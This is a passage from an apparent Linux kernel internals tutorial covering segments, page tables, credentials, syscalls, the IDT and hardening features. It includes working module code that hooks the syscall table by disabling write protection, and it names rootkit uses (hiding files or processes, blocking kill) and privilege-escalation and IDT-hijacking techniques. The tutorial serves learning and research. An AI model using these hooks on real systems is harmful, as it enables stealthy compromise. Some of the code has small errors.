new_ip, new_sp, __USER_CS, __USER_DS, 0); } EXPORT_SYMBOL_GPL(start_thread); As you are able to see, this function is just a wrapper around start_thread_common(): static void start_thread_common(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp, unsigned int _cs, unsigned int _ss, unsigned int _ds) { WARN_ON_ONCE(regs != current_pt_regs()); if (static_cpu_has(X86_BUG_NULL_SEG)) { loadsegment(fs, __USER_DS); load_gs_index(__USER_DS); } loadsegment(fs, 0); loadsegment(es, _ds); loadsegment(ds, _ds); load_gs_index(0); regs->ip = new_ip; regs->sp = new_sp; regs->cs = _cs; regs->ss = _ss; regs->flags = X86_EFLAGS_IF; force_iret(); } As a conclusion, every process starts with default segment registers, but different GPRs, stack and instruction pointer, and by looking at __USER_DS and __USER_CS: #define GDT_ENTRY_DEFAULT_USER_DS 5 #define GDT_ENTRY_DEFAULT_USER_CS 6 #define __USER_DS (GDT_ENTRY_DEFAULT_USER_DS*8 + 3) #define __USER_CS (GDT_ENTRY_DEFAULT_USER_CS*8 + 3) We would find the segment registers and their values on user-space: Initial state: CS = 6*8+3 = 0x33 SS = 5*8+3 = 0x2b DS = FS = ES = 0 These values can be checked using GDB and a dummy binary. (gdb) b* main Breakpoint 1 at 0x6b0 (gdb) r Starting program: /root/mod/cs Breakpoint 1, 0x00005555555546b0 in main () (gdb) info reg cs ss cs 0x33 51 ss 0x2b 43 Also, you should know that, CS holds in it’s least 2 significant bits, the Current Privilege Level(CPL), other segment selectors hold the Requested Privilege Level(RPL) instead of CPL. (gdb) p/t $cs $1 = 110011 (gdb) p/x $cs & 0b11 $2 = 0x3 # (Privilege Level: User(3) SuperUser(0)) (gdb) p/d $cs & ~0b1111 $3 = 48 # (Table Offset: 48) (gdb) p/d $cs & 0b100 $4 = 0 # (Table Indicator: GDT(0) LDT(1)) 3 stands for the third ring, least privileged, that is, user-space. It doesn’t change, unless the execution is in kernel-space, so it’s similiar for both root and any normal user. So both RPL and CPL could be considered a form of limitation when accessing segments with lower(more privileged) DPL(Descriptor Privilege Level). When it comes to paging, it’s equivalent bit in CR0(#31) is only set when the system is running in protected mode(PE bit in CR0 is set), because in real mode, virtual address are equal to physical ones. Linux moved from four-level page tables to support five-level page tables by adding an additional layer(P4D), so the levels now are: PGD P4D PUD PMD PTE. PGD is the first level Page Global Directory, it is a pointer of type pgd_t, and it’s definition is: typedef struct { pgdval_t pgd; } pgd_t; It holds a pgdval_t inside, which is an unsigned long(8 bytes on x86_64, 4 on x86_32? typedef unsigned long pgdval_t; To get to the next level, pagetable_l5_enabled() is called to check if the CPU has X86_FEATURE_LA57 enabled. #define pgtable_l5_enabled() cpu_feature_enabled(X86_FEATURE_LA57) This can be seen in p4d_offset(): static inline p4d_t *p4d_offset(pgd_t *pgd, unsigned long address) { if (!pgtable_l5_enabled()) return (p4d_t *)pgd; return (p4d_t *)pgd_page_vaddr(*pgd) + p4d_index(address); } If it isn’t enabled, it simply casts the pgd_t * as p4d_t * and returns it, otherwise it returns the P4D entry within the PGD that links to the specific address. Then P4D itself can be used to find the next level, which is PUD of type pud_t *, PUD links to PMD(Page Middle Directory) and PMD to the PTE(Page Table Entry) which is the last level, and contains the physical address of the page with some protection flags and is of type pte_t *. Each process has it’s own virtual space(mm_struct, vm_area_struct and pgd_t). struct vm_area_struct { unsigned long vm_start; unsigned long vm_end; struct vm_area_struct *vm_next, *vm_prev; struct rb_node vm_rb; unsigned long rb_subtree_gap; struct mm_struct *vm_mm; pgprot_t vm_page_prot; unsigned long vm_flags; struct { struct rb_node rb; unsigned long rb_subtree_last; } shared; struct list_head anon_vma_chain; struct anon_vma *anon_vma; const struct vm_operations_struct *vm_ops; unsigned long vm_pgoff; struct file * vm_file; void * vm_private_data; atomic_long_t swap_readahead_info; #ifndef CONFIG_MMU struct vm_region *vm_region; #endif #ifdef CONFIG_NUMA struct mempolicy *vm_policy; #endif struct vm_userfaultfd_ctx vm_userfaultfd_ctx; } __randomize_layout; typedef struct { pgdval_t pgd; } pgd_t; So creating a new process would be very expensive on performance. Copy-on-Write(COW) comes in helpful here, by making a clone out of the parent process and only copying when a write happens to the previously marked read-only pages. This happens on fork and more specifically in copy_process(), which duplicates the task_struct and does specific operations depending on flags passed to clone(), before copying all parent information which includes credentials, filesystem, files, namespaces, IO, Thread Local Storage, signal, address space. As an example, this walks VMAs in search of a user specified address, once found, it gets its Physical address and Flags by walking page tables. #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <asm/pgtable.h> #include <linux/highmem.h> #include <linux/slab.h> #define device_name "useless" #define SET_ADDRESS 0x00112233 char *us_buf; unsigned long address = 0; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ switch(cmd){ case SET_ADDRESS: address = arg; return 0; default: return -EINVAL; } } ssize_t do_read(struct file *filp, char *buf, size_t count, loff_t *offp){ int res, phys, flags; struct vm_area_struct *cmap; pgd_t *pgd; p4d_t *p4d; pud_t *pud; pmd_t *pmd; pte_t *ptep; /* Find corresponding VMA */ cmap = current->mm->mmap; while(1){ if(cmap->vm_start >= address && address < cmap->vm_end){ break; } cmap = cmap->vm_next; if(cmap == NULL){ return -1; } }; /* Walking Page-tables for fun */ pgd = pgd_offset(current->mm, address); p4d = p4d_offset(pgd, address); pud = pud_offset(p4d, address); pmd = pmd_offset(pud, address); ptep = pte_offset_kernel(pmd, address); phys = *((int *) ptep); flags = phys & 0xfff; phys &= ~0xfff; snprintf(us_buf, 64, "PhysAddr(%x) VMAStart(%lx) Flags(%x)", phys, cmap->vm_start, flags); if(count > 64) count = 64; res = copy_to_user(buf, us_buf, count); return res; } struct file_operations fileops = { .owner = THIS_MODULE, .read = do_read, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; us_buf = kmalloc(64, GFP_KERNEL); if(us_buf == NULL){ printk(KERN_ERR "Couldn't reserve memory."); return -ENOMEM; } res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); kfree(us_buf); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); To communicate with this proc entry, the following was written: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SET_ADDRESS 0x00112233 void main(void){ int fd; char *ok; char c[64]; fd = open(device_path, O_RDONLY); ok = malloc(512); memcpy(ok, "Welp", sizeof(int )); ioctl(fd, SET_ADDRESS, ok); read(fd, c, sizeof( c)); printf("%s\n", &c); } This gives: 0x867 in binary is: 100001100111. Present: 1 (The page is present) R/W: 1 (The page have both read and write permissions) U/S: 1 (The page can be accessed by the user and supervisor) 00 Accessed: 1 (Set if the page had been accessed) Dirty: 1 (Set if the page was written to since last writeback) 0000 Note that necessary checks on validity of return values was ignored in this example, these could be performed with p??_none() and p??_present(), and multiple other things could have been done, such as playing with the PFN or page or reading from the Physical Address with void __iomem *, ioremap() and memcpy_fromio() or struct page * and kmap(). Translating address from virtual to physical takes time, so caching is implemented using the TLB(Translation Lookaside Buffer) to improve the performance, hopefully that the next access is going to land a cache-hit and that’ll hand the PTE faster than a miss where a memory access is forced to happen to get it. The TLB flushes from time to another, an example would be after a page fault is raised and completed. Processes: The kernel sees each process as a struct task_struct which is a huge struct that contains many fields which we can’t cover entirely, some are used to guarantee the (almost) fair scheduling and some show the task’s state(if it’s either unrunnable, runnable or stopped), priority, the parent process, a linked list of children processes, the address space it holds, and many others. We are mainly interested in the const struct cred __rcu *cred; which holds the task’s credentials. struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; kgid_t gid; kuid_t suid; kgid_t sgid; kuid_t euid; kgid_t egid; kuid_t fsuid; kgid_t fsgid; unsigned securebits; kernel_cap_t cap_inheritable; kernel_cap_t cap_permitted; kernel_cap_t cap_effective; kernel_cap_t cap_bset; kernel_cap_t cap_ambient; #ifdef CONFIG_KEYS unsigned char jit_keyring; struct key __rcu *session_keyring; struct key *process_keyring; struct key *thread_keyring; struct key *request_key_auth; #endif #ifdef CONFIG_SECURITY void *security; #endif struct user_struct *user; struct user_namespace *user_ns; struct group_info *group_info; struct rcu_head rcu; } __randomize_layout; This struct holds Capabilities, ((effective) user and group) ID, keyrings, (for synchronization, Read-Copy-Update) RCU, (tracks the user’s usage of the system by keeping counts) user and (holds U/G ID and the privileges for them) user_ns. In order to better understand this structure, a simple proc entry was created which extracts the task_struct of the process that uses it(current) and reads the effective UID and GID. #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/uidgid.h> #define device_name "useless" #define SD_PRIV 0x10071007 struct{ kuid_t ceuid; kgid_t cegid; spinlock_t clock; }us_cd; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ int res; switch(cmd){ case SD_PRIV: spin_lock(&us_cd.clock); current_euid_egid(&us_cd.ceuid, &us_cd.cegid); spin_unlock(&us_cd.clock); res = copy_to_user((void *)arg, &us_cd, 8); return res; default: return -EINVAL; } } struct file_operations fileops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; spin_lock_init(&us_cd.clock); res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); The initialization process starts by preparing the spinlock and creating a proc entry with a specified name “useless” and a file_operations struct containing only necessary owner and unlocked_ioctl entries. While the ioctl handler simply checks if the command passed was SD_PRIV to extract the UID and GID with a call to the current_euid_egid() macro which in turn calls current_cred() to extract the current->cred: #define current_euid_egid(_euid, _egid) \ do { \ const struct cred *__cred; \ __cred = current_cred(); \ *(_euid) = __cred->euid; \ *(_egid) = __cred->egid; \ } while(0) #define current_cred() \ rcu_dereference_protected(current->cred, 1) Then, we create a tasktry.c to interract with the /proc/useless. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SD_PRIV 0x10071007 struct{ unsigned int uid; unsigned int gid; }data; void main(void){ int fd; fd = open(device_path, O_RDONLY); ioctl(fd, SD_PRIV, &data); printf("UID: %d GID: %d\n", data.uid, data.gid); } Two binaries are then created in /tmp directory, one which is compiled by root(setuid bit set) tasktry_root and the other by a normal user called tasktry_user. root@Nwwz:~# cd /tmp root@Nwwz:/tmp# gcc tasktry.c -o tasktry_root; chmod u+s tasktry_root root@Nwwz:/tmp# cd /root/mod root@Nwwz:~/mod# make make -c /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/task.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/task.mod.o LD [M] /root/mod/task.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod task.ko root@Nwwz:~/mod# su - user user@Nwwz:~$ cd /tmp user@Nwwz:/tmp$ gcc tasktry.c -o tasktry_user user@Nwwz:/tmp$ ls tasktry_user tasktry_root tasktry.c user@Nwwz:/tmp$ ./tasktry_root UID: 0 GID: 1000 user@Nwwz:/tmp$ ./tasktry_user UID: 1000 GID: 1000 As you can see, the effective UID of tasktry_root is 0 making it own high privileges, so overwritting effective creds is one way to privilege escalation(prepare_kernel_creds() and commit_creds() are used for this purpose in most exploits, instead of getting the stack base and overwritting it directly.), another is to change capabilities. On Windows, one way to escalate privileges would be to steal the token of System process(ID 4) and assign it to the newly spawned cmd.exe after changing the reference count: image.png910x355 33.2 KB Syscalls: Processes running in userspace can still communicate with the kernel, thanks to syscalls. Each syscall is defined as follows: SYSCALL_DEFINE0(getpid) { return task_tgid_vnr(current); } With multiple arguments: SYSCALL_DEFINE3(lseek, unsigned int, fd, off_t, offset, unsigned int, whence) { return ksys_lseek(fd, offset, whence); } So, in general: SYSCALL_DEFINE[ARG_COUNT]([SYSCALL_NAME], [ARG_TYPE], [ARG_NAME]){ /* Passing the argument to another function, for processing. */ return call_me([ARG_NAME]); } Few tries aaand : #include <stdio.h> #include <string.h> #include <unistd.h> int main(void){ printf("ID: %d\n", getuid()); return 0; } Running this sample with GDB and putting breakpoint on the x64 libc, we can see that it does set EAX register to 0x66(syscall number on x64) before the syscall instruction. (gdb) x/i $rip => 0x555555554704 <main+4>: callq 0x5555555545a0 <getuid@plt> (gdb) x/x getuid 0x7ffff7af2f30 <getuid>: 0x000066b8 (gdb) b* getuid Breakpoint 2 at 0x7ffff7af2f30: file ../sysdeps/unix/syscall-template.S, line 65. (gdb) c Continuing. Breakpoint 2, getuid () at ../sysdeps/unix/syscall-template.S:65 65 ../sysdeps/unix/syscall-template.S: No such file or directory. (gdb) disas $rip Dump of assembler code for function getuid: => 0x00007ffff7af2f30 <+0>: mov $0x66,%eax 0x00007ffff7af2f35 <+5>: syscall 0x00007ffff7af2f37 <+7>: retq End of assembler dump. (gdb) shell root@Nwwz:~# echo "g" > /proc/sysrq-trigger We can invoke a shell from GDB to force SysRQ, and see what this offset in the kernel links for: [New Thread 756] [New Thread 883] [New Thread 885] Thread 103 received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 889] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 10733 wmb(); /* Sync point after breakpoint */ (gdb) p &sys_call_table $1 = (const sys_call_ptr_t (*)[]) 0xffffffff81c00160 <sys_call_table> (gdb) x/gx (void *)$1 + 0x66*8 0xffffffff81c00490 <sys_call_table+816>: 0xffffffff8108ec60 (gdb) x/i 0xffffffff8108ec60 0xffffffff8108ec60 <__x64_sys_getuid>: nopl 0x0(%rax,%rax,1) So, it’s the global sys_call_table, indexing the __x64_sys_getuid there. "The __x64_sys_*() stubs are created on-the-fly for sys_*() system calls" is written in syscall_64.tbl that contains all the syscalls available to the kernel. This is similiar to the nt!KiServiceTable on Windows. kd> dps nt!KeServiceDescriptorTable 82b759c0 82a89d9c nt!KiServiceTable 82b759c4 00000000 82b759c8 00000191 82b759cc 82a8a3e4 nt!KiArgumentTable 82b759d0 00000000 82b759d4 00000000 kd> dd nt!KiServiceTable 82a89d9c 82c85c28 82acc40d 82c15b68 82a3088a 82a89dac 82c874ff 82b093fa 82cf7b05 82cf7b4e 82a89dbc 82c0a3bd 82d11368 82d125c1 82c00b95 kd> ln 82c85c28 (82c85c28) nt!NtAcceptConnectPort | (82c85ca5) nt!EtwpRundownNotifications Exact matches: nt!NtAcceptConnectPort = <no type information> kd> ln 82acc40d (82acc40d) nt!NtAccessCheck | (82acc43e) nt!PsGetThreadId Exact matches: nt!NtAccessCheck = <no type information> kd> ln 82d125c1 (82d125c1) nt!NtAddDriverEntry | (82d125f3) nt!NtDeleteDriverEntry Exact matches: nt!NtAddDriverEntry = <no type information> Dissasembling it gives us: (gdb) disas __x64_sys_getuid Dump of assembler code for function __x64_sys_getuid: 0xffffffff8108ec60 <+0>: nopl 0x0(%rax,%rax,1) 0xffffffff8108ec65 <+5>: mov %gs:0x15c00,%rax 0xffffffff8108ec6e <+14>: mov 0x668(%rax),%rax 0xffffffff8108ec75 <+21>: mov 0x4(%rax),%esi 0xffffffff8108ec78 <+24>: mov 0x88(%rax),%rdi 0xffffffff8108ec7f <+31>: callq 0xffffffff8112d4a0 <from_kuid_munged> 0xffffffff8108ec84 <+36>: mov %eax,%eax 0xffffffff8108ec86 <+38>: retq With a basic understanding of ASM and a very limited knowledge of the kernel (AT&T haha, too lazy to switch the syntax .), one can know that it does first search for the current task, store some pointer it holds at offset 0x668 at RAX before dereferencing it again and using content at +0x88(RDI) and +0x4(RSI) as arguments to the from_kuid_munged call before it nops and returns(q there stands for qword). We can verify this either by looking at the source: SYSCALL_DEFINE0(getuid) { return from_kuid_munged(current_user_ns(), current_uid()); } uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid) { uid_t uid; uid = from_kuid(targ, kuid); if (uid == (uid_t) -1) uid = overflowuid; return uid; } EXPORT_SYMBOL(from_kuid_munged); Or checking in GDB(maybe both?? (gdb) b* __x64_sys_getuid Breakpoint 1 at 0xffffffff8108ec60: file kernel/sys.c, line 920. (gdb) c [New Thread 938] [Switching to Thread 938] Thread 122 hit Breakpoint 1, __x64_sys_getuid () at kernel/sys.c:920 920 { (gdb) ni get_current () at ./arch/x86/include/asm/current.h:15 15 return this_cpu_read_stable(current_task); (gdb) x/i $rip => 0xffffffff8108ec65 <__x64_sys_getuid+5>: mov %gs:0x15c00,%rax (gdb) p ((struct task_struct *)0)->cred Cannot access memory at address 0x668 (gdb) p ((struct cred *)0)->uid Cannot access memory at address 0x4 (gdb) p ((struct cred *)0)->user_ns Cannot access memory at address 0x88 The sys_call_table is residing in a RO(read only) memory space: (gdb) x/x sys_call_table 0xffffffff81c00160 <sys_call_table>: 0xffffffff81247310 (gdb) maintenance info sections ... [3] 0xffffffff81c00000->0xffffffff81ec1a42 at 0x00e00000: .rodata ALLOC LOAD RELOC DATA HAS_CONTENTS ... (gdb) But a kernel module can overcome this protection and place a hook at any systemcall. For that, two example modules will be given: =] Disabling the previously discussed WP(write-protect) bit in the CR0(control register #0), using read_cr0 and write_cr0 to acheive that. #include <linux/fs.h> #include <asm/pgtable.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/uaccess.h> #include <linux/kallsyms.h> #include <linux/miscdevice.h> #include <asm/special_insns.h> #define device_name "hookcontrol" #define ioctl_base 0x005ec #define ioctl_enable ioctl_base+1 #define ioctl_disable ioctl_base+2 int res; int (*real_getuid)(void); void **sys_call_table; unsigned long const *address; static int hooked_getuid(void){ printk(KERN_INFO "Received getuid call from %s!", current->comm); if(real_getuid != NULL){ return real_getuid(); } return 0; } long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ unsigned long cr0 = read_cr0(); switch(cmd){ case ioctl_enable: printk(KERN_INFO "Enabling hook!"); write_cr0(cr0 & ~0x10000); sys_call_table[__NR_getuid] = hooked_getuid; write_cr0(cr0 | 0x10000); printk(KERN_INFO "Successfully changed!"); return 0; case ioctl_disable: printk(KERN_INFO "Disabling hook!"); write_cr0(cr0 & ~0x10000); sys_call_table[__NR_getuid] = real_getuid; write_cr0(cr0 | 0x10000); printk(KERN_INFO "Successfully restored!"); return 0; default: return -EINVAL; } } struct file_operations file_ops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl }; struct miscdevice hk_dev = { MISC_DYNAMIC_MINOR, device_name, &file_ops }; static int us_init(void){ res = misc_register(&hk_dev); if(res){ printk(KERN_ERR "Couldn't load module!"); return -1; } sys_call_table = (void *) kallsyms_lookup_name("sys_call_table"); real_getuid = sys_call_table[__NR_getuid]; address = (unsigned long *) &sys_call_table; printk(KERN_INFO "Module successfully loaded with minor: %d!", hk_dev.minor); return 0; } static void us_exit(void){ misc_deregister(&hk_dev); } MODULE_LICENSE("GPL"); module_init(us_init); module_exit(us_exit); =] Orr’ing the protection mask of the page at which it resides(__pgprot(_PAGE_RW))( set_memory_rw() & set_memory_rw()), or directly modifying the PTE. static inline pte_t pte_mkwrite(pte_t pte) { return pte_set_flags(pte, _PAGE_RW); } static inline pte_t pte_wrprotect(pte_t pte) { return pte_clear_flags(pte, _PAGE_RW); } Looking at these functions, one can safely assume that manipulation can be acheived with simple OR and AND(_PAGE_RW) operations on the pte_t. pte_t *lookup_address(unsigned long address, unsigned int *level) { return lookup_address_in_pgd(pgd_offset_k(address), address, level); } Since it’s a kernel address, pgd_offset_k() is called, which makes use of &init_mm, instead of a mm_struct belonging to some process of one’s choice. pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address, unsigned int *level) { p4d_t *p4d; pud_t *pud; pmd_t *pmd; *level = PG_LEVEL_NONE; if (pgd_none(*pgd)) return NULL; p4d = p4d_offset(pgd, address); if (p4d_none(*p4d)) return NULL; *level = PG_LEVEL_512G; if (p4d_large(*p4d) || !p4d_present(*p4d)) return (pte_t *)p4d; pud = pud_offset(p4d, address); if (pud_none(*pud)) return NULL; *level = PG_LEVEL_1G; if (pud_large(*pud) || !pud_present(*pud)) return (pte_t *)pud; pmd = pmd_offset(pud, address); if (pmd_none(*pmd)) return NULL; *level = PG_LEVEL_2M; if (pmd_large(*pmd) || !pmd_present(*pmd)) return (pte_t *)pmd; *level = PG_LEVEL_4K; return pte_offset_kernel(pmd, address); } so, the ioctl handler looks like this: long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ unsigned int level; pte_t *pte = lookup_address(*address, &level);; switch(cmd){ case ioctl_enable: printk(KERN_INFO "Enabling hook!"); pte->pte |= _PAGE_RW; sys_call_table[__NR_getuid] = hooked_getuid; pte->pte &= ~_PAGE_RW; printk(KERN_INFO "Successfully changed!"); return 0; case ioctl_disable: printk(KERN_INFO "Disabling hook!"); pte->pte |= _PAGE_RW; sys_call_table[__NR_getuid] = real_getuid; pte->pte &= ~_PAGE_RW; printk(KERN_INFO "Successfully restored!"); return 0; default: return -EINVAL; } } (Know that these are only examples, usually, replacing should take place at init and restoring the original at exit, plus the definition of both the hook and original handlers, should hold asmlinkage(passing arguments in stack, unlike fastcall(default) in registers), however, since the syscall here holds no arguments, this was ignored.) By running an application from user-space to interact with /dev/hookcontrol: (enabling and disabling after a while) and taking a look at dmesg: This can be used to provide a layer on the syscall, prevent or manipulate the return value, like kill to prevent a process from being killed, getdents to hide some files, unlink to prevent a file from being deleted, et cetera… And it doesn’t stop here, even without syscall hooking, one can play with processes(hide them as an example…) with task_struct elements and per-task flags, or change the file_operations in some specific struct, and many other possibilities. IDT(Interrupt Descriptor Table): In order to handle exceptions, this table exists, by linking a specific handler to each exception, it helps deal with those raised from userspace(a translation to ring zero is required first) and kernelspace. It first is initialized during early setup, and this can be seen in setup_arch() which calls multiple functions, some to setup the IDT, most important to us is idt_setup_traps(): void __init idt_setup_traps(void) { idt_setup_from_table(idt_table, def_idts, ARRAY_SIZE(def_idts), true); } It makes use of the default IDTs array(def_idts). static const __initconst struct idt_data def_idts[] = { INTG(X86_TRAP_DE, divide_error), INTG(X86_TRAP_NMI, nmi), INTG(X86_TRAP_BR, bounds), INTG(X86_TRAP_UD, invalid_op), INTG(X86_TRAP_NM, device_not_available), INTG(X86_TRAP_OLD_MF, coprocessor_segment_overrun), INTG(X86_TRAP_TS, invalid_TSS), INTG(X86_TRAP_NP, segment_not_present), INTG(X86_TRAP_SS, stack_segment), INTG(X86_TRAP_GP, general_protection), INTG(X86_TRAP_SPURIOUS, spurious_interrupt_bug), INTG(X86_TRAP_MF, coprocessor_error), INTG(X86_TRAP_AC, alignment_check), INTG(X86_TRAP_XF, simd_coprocessor_error), #ifdef CONFIG_X86_32 TSKG(X86_TRAP_DF, GDT_ENTRY_DOUBLEFAULT_TSS), #else INTG(X86_TRAP_DF, double_fault), #endif INTG(X86_TRAP_DB, debug), #ifdef CONFIG_X86_MCE INTG(X86_TRAP_MC, &machine_check), #endif SYSG(X86_TRAP_OF, overflow), #if defined(CONFIG_IA32_EMULATION) SYSG(IA32_SYSCALL_VECTOR, entry_INT80_compat), #elif defined(CONFIG_X86_32) SYSG(IA32_SYSCALL_VECTOR, entry_INT80_32), #endif }; On x86_32 as an example, when an int 0x80 is raised. the following happens: static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs) { struct thread_info *ti = current_thread_info(); unsigned int nr = (unsigned int)regs->orig_ax; #ifdef CONFIG_IA32_EMULATION ti->status |= TS_COMPAT; #endif if (READ_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY) { nr = syscall_trace_enter(regs); } if (likely(nr < IA32_NR_syscalls)) { nr = array_index_nospec(nr, IA32_NR_syscalls); #ifdef CONFIG_IA32_EMULATION regs->ax = ia32_sys_call_table[nr](regs); #else regs->ax = ia32_sys_call_table[nr]( (unsigned int)regs->bx, (unsigned int)regs->cx, (unsigned int)regs->dx, (unsigned int)regs->si, (unsigned int)regs->di, (unsigned int)regs->bp); #endif } syscall_return_slowpath(regs); } __visible void do_int80_syscall_32(struct pt_regs *regs) { enter_from_user_mode(); local_irq_enable(); do_syscall_32_irqs_on(regs); } It would call enter_from_user_mod() to , then enable Interrupt Requests(IRQs) on the current CPU. Push the saved registers to find the syscall number(EAX), use it as an index in the ia32_sys_call_table array. Arguments are passed to the handler in registers with the following order: EBX, ECX, EDX, ESI, EDI, EBP. However, the first object as seen in the idt_table is the X86_TRAP_DE(divide error). This can be seen from GDB, that the first gate within idt_table holds the offset_high, offset_middle and offset_low referencing divide_error. Which would deal with division by 0 exceptions. (gdb) p idt_table $1 = 0xffffffff82598000 <idt_table> (gdb) p/x *(idt_table + 0x10*0) $2 = {offset_low = 0xb90, segment = 0x10, bits = {ist = 0x0, zero = 0, type = 14, dpl = 0, p = 1}, offset_middle = 0x8180, offset_high = 0xffffffff, reserved = 0x0} (gdb) x/8i 0xffffffff81800b90 0xffffffff81800b90 <divide_error>: nopl (%rax) 0xffffffff81800b93 <divide_error+3>: pushq $0xffffffffffffffff 0xffffffff81800b95 <divide_error+5>: callq 0xffffffff81801210 <error_entry> 0xffffffff81800b9a <divide_error+10>: mov %rsp,%rdi 0xffffffff81800b9d <divide_error+13>: xor %esi,%esi 0xffffffff81800b9f <divide_error+15>: callq 0xffffffff81025d60 <do_devide_error> 0xffffffff81800ba4 <divide_error+20>: jmpq 0xffffffff81801310 <error_exit> You can see that it’s DPL is zero, that is, an int $0x00 from a userland process wouldn’t help reaching it(unlike int $0x03, int $0x04 or int $0x80). Gate descriptors are initialized in idt_setup_from_table which calls idt_init_desc: idt_setup_from_table(gate_desc *idt, const struct idt_data *t, int size, bool sys) { gate_desc desc; for (; size > 0; t++, size--) { idt_init_desc(&desc, t); write_idt_entry(idt, t->vector, &desc); if (sys) set_bit(t->vector, system_vectors); } } And here it is. static inline void idt_init_desc(gate_desc *gate, const struct idt_data *d) { unsigned long addr = (unsigned long) d->addr; gate->offset_low = (u16) addr; gate->segment = (u16) d->segment; gate->bits = d->bits; gate->offset_middle = (u16) (addr >> 16); #ifdef CONFIG_X86_64 gate->offset_high = (u32) (addr >> 32); gate->reserved = 0; #endif } This could be used by the attacker, such as by getting the IDT address using the SIDT instruction, and looking for a specific handler in the list, incrementing offset_high would set it to 0. As we said above, we're going to use the IDT and overwrite one of its entries (more precisely a Trap Gate, so that we're able to hijack an exception handler and redirect the code-flow towards userspace). Each IDT entry is 64-bit (8-bytes) long and we want to overflow the 'base_offset' value of it, to be able to modify the MSB of the exception handler routine address and thus redirect it below PAGE_OFFSET (0xc0000000) value. ~ Phrack 2 KSPP: This is a protection that appeared starting from 4.8, it’s name is a short for: “Kernel self-protection project”, It does provide additional checks on copy_to_user() and copy_from_user() to prevent classic buffer-overflows bugs from happening, by checking the saved compile-time buffer size and making sure it fits. if not, abort and prevent any possible exploitation from happening. root@Nwwz:~/mod# cd /usr/src root@Nwwz:/usr/src# cd linux-4.17.2 root@Nwwz:/usr/src/linux-4.17.2# cd include root@Nwwz:/usr/src/linux-4.17.2/include# nano uaccess.h We can directly see a check that’s likely to be 1, before proceeding to the copy operation: static __always_inline unsigned long __must_check copy_from_user(void *to, const void __user *from, unsigned long n) { if (likely(check_copy_size(to, n, false))) n = _copy_from_user(to, from, n); return n; } static __always_inline unsigned long __must_check copy_to_user(void __user *to, const void *from, unsigned long n) { if (likely(check_copy_size(from, n, true))) n = _copy_to_user(to, from, n); return n; } The check function is as follows, it does first check the compile-time size against the requested size, and calls __bad_copy_from() or __bad_copy_to() depending on the boolean is_source if it seems like an overflow is possible, which is unlikely of course(or not?), it then returns false. If not, it does call check_object_size() and returns true. extern void __compiletime_error("copy source size is too small") __bad_copy_from(void); extern void __compiletime_error("copy destination size is too small") __bad_copy_to(void); static inline void copy_overflow(int size, unsigned long count) { WARN(1, "Buffer overflow detected (%d < %lu)!\n", size, count); } static __always_inline bool check_copy_size(const void *addr, size_t bytes, bool is_source) { int sz = __compiletime_object_size(addr); if (unlikely(sz >= 0 && sz < bytes)) { if (!__builtin_constant_p(bytes)) copy_overflow(sz, bytes); else if (is_source) __bad_copy_from(); else __bad_copy_to(); return false; } check_object_size(addr, bytes, is_source); return true; } This function is simply just a wrapper around __check_object_size(). #ifdef CONFIG_HARDENED_USERCOPY extern void __check_object_size(const void *ptr, unsigned long n, bool to_user); static __always_inline void check_object_size(const void *ptr, unsigned long n, bool to_user) { if (!__builtin_constant_p(n)) __check_object_size(ptr, n, to_user); } #else static inline void check_object_size(const void *ptr, unsigned long n, bool to_user) { } #endif Additional checks are provided here in __check_object_size(), and as the comment says, not a kernel .text address, not a bogus address and is a safe heap or stack object. void __check_object_size(const void *ptr, unsigned long n, bool to_user) { if (static_branch_unlikely(&bypass_usercopy_checks)) return; if (!n) return; check_bogus_address((const unsigned long)ptr, n, to_user); check_heap_object(ptr, n, to_user); switch (check_stack_object(ptr, n)) { case NOT_STACK: break; case GOOD_FRAME: case GOOD_STACK: return; default: usercopy_abort("process stack", NULL, to_user, 0, n); } check_kernel_text_object((const unsigned long)ptr, n, to_user); } EXPORT_SYMBOL(__check_object_size); With this, it does provide enough to block and kill classic buffer-overflow bugs, this can be disabled by commenting the check and recompiling a module. KASLR: Stands for Kernel Address Space Layout Randomization. It’s similiar to the ASLR on userspace which protects the stack and heap addresses from being at the same location in two different runs(unless the attacker gets lucky ). PIE too since it does target the main binary segments which are text, data and bss. This protection randomizes the kernel 